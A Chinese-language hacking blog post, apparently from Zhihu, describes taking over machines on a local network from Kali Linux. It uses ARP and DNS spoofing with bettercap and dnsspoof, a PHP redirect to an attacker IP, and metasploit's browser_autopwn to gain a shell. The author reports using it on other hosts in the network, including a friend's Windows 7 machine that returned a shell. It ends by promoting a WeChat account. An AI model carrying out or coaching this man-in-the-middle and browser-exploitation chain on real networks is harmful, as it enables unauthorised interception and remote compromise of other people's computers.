我是如何統治內網的
日出東方,唯我不敗;千秋萬代,一統江湖!
教主文成武德、澤被蒼生 ,千秋萬載,一統江湖!
測試主機:kali 2016.2
工具:bettercap、metasploit、dnsspoof、armitage
前期準備工作
在kali下並沒有集成bettercap,所以我們需要自己安裝
安裝完成
啟動postgresql服務
metasploit資料庫初始化查看資料庫鏈接狀態,如果這裡顯示資料庫未連接可以參考:傳送門 連接資料庫啟動armitage(關於armitage)
準備一個hosts文件(用於DNS欺騙)
更改:剛才試了一下,在hosts文件中加上埠號好像會出現一些意料不到的問題。這裡我們換個思路,直接到ip地址不加埠號,然後開啟apache服務,然後將下面的代碼保存為index.php放在根目錄下(/var/www/html/)
<?php header("Location:http://10.167.33.1:8080"); ?>n
這樣在DNS欺騙後會跳到指定ip,然後在通過php重定向到我們的payload。
還有一種方法是在下邊啟動瀏覽器自動攻擊插件時,將埠號直接改成80埠。
/**************************************zhun bei wan cheng *****************************************/
啟動瀏覽器自動攻擊模塊:browser_autopwnDNS欺騙(忘了截圖 圖是後補的 所以參數有點不一樣)
現在我們就等魚上鉤,現在同一網關下的主機不管打開什麼URL都會解析到我們的URL中,當他打開我們的URL時,程序會自動驗證哪個pay可用
我們的DNS欺騙只對同一網關下的主機有效,但是我們共計用的URL只要能訪問到我們的地址就可以。下圖可以看到有兩台win10主機為arp+dns欺騙過來的,而安卓兩台win7是我將這個URL發給了我的朋友,當然他也是在內網中的。如果我們需要攻擊一台公網中的主機可以參考公網的Shell如何返回到內網的Kali 。最終有一台win7的瀏覽器成功運行了我們的payload並返回了shell。查看文件
屏幕截圖
當然功能遠遠不止這些,更多好玩的可以自己探索。
水平有限,有錯誤請指出。
如果有一塊學習的同志私聊我上車。
上車的有點多,要超載了,關注公眾號吧,公眾號更新會比知乎的更全面
公眾號:sssie95zz
二維碼鏈接如下:
http://weixin.qq.com/r/EjoZAYjEkdXurcxi928A (二維碼自動識別)
推薦閱讀: